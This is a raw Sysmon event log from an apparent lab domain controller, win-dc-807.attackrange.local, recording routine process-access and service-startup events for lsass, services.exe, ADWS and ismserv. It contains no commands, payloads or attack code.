15:51:15.706{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3000-000000008801}2696C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0A00-000000008801}852940C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3000-000000008801}2696C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.704{D28789B6-7C73-5FA1-3000-000000008801}2696C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.0Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F8D0C92070E59A059A889D5E269C0DA9,SHA256=D40478A82BB2993F39A3ED6066CD0599BE37FF9A0898636A680926FE145C64D6,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}8681116C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0A00-000000008801}8522968C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3100-000000008801}2596C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3100-000000008801}2596C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0A00-000000008801}852948C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3100-000000008801}2596C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.704{D28789B6-7C73-5FA1-3100-000000008801}2596C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 